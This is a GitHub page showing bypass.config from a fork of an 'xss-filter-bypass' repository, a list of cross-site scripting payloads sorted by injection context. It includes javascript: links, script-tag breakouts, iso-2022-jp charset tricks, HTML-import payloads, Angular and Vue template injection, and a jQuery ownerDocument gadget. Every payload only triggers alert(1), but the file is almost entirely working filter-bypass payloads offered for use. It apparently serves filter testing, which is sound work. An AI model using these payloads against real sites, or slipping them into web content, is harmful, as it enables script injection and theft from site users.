forked from barretlee/xss-filter-bypass
-
Notifications
You must be signed in to change notification settings - Fork 0
/
bypass.config
91 lines (91 loc) · 2.28 KB
/
bypass.config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
{
link: [
{
inject: 'javascript:alert(1)',
comment: 'xss'
}
],
str_literal: [
{
inject: '";alert(1)//"',
encode: true,
comment: 'xss'
}
],
text: [
{
inject: '`-alert(1)</script><script>`',
repeat: 2,
comment: 'xss'
}
],
plain: [
{
inject: '%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E',
mime: 'xml',
comment: 'xss'
},
{
inject: '<meta%20charset=iso-2022-jp><svg%20o%1B(Bnload=alert(1)>',
mime: 'html',
comment: 'xss'
},
{
inject: '<meta%20charset=iso-2022-jp><script>alert(1)%1B(I%0A</script>',
mime: 'html',
comment: 'xss'
},
{
inject: '%3Clink%20rel%3Dimport%20href%3D%22%2Fraw%2F%3Cscript%3Ealert(1)%3C%252Fscript%3E%22%3E',
comment: 'xss'
},
{
inject: '<script%20src=%2Fresources%2Fxss.js></script>',
comment: 'xss'
},
{
inject: '%3Clink%20rel=import%20href=%2Fresources%2Fxss.jpg%3E',
comment: 'xss'
},
{
inject: '%3Cscript%20src=%22/resources/angular-1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}',
comment: 'Angular injection'
},
{
inject: '%3Clink%20rel=import%20href=/resources/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}}',
comment: 'Vue injection'
},
{
inject: '%3Clink%20rel=import%20href=/resources/jquery.html%3E%3Cp%20class=container%3E%3C/p%3E%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E',
comment: 'jQuery injection'
}
],
dom_innerhtml: [
{
inject: '#%3Cimg%20src=x%20onerror=alert(1)%3E',
hash: true,
comment: 'xss'
}
],
dom_redirect: [
{
inject: '#javascript:alert(1)',
hash: true,
comment: 'xss'
}
],
xml: [
{
inject: '%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E',
mime: 'xml',
comment: 'xss'
}
],
jquery: [
{
inject: '%3Cform%20class=child%3E%3Cinput%20name=ownerDocument%3E%3Cscript%3E%3C!--alert(1)%3C/script%3E%3C/form%3E',
mime: 'html',
comment: 'jQuery injection'
}
]
}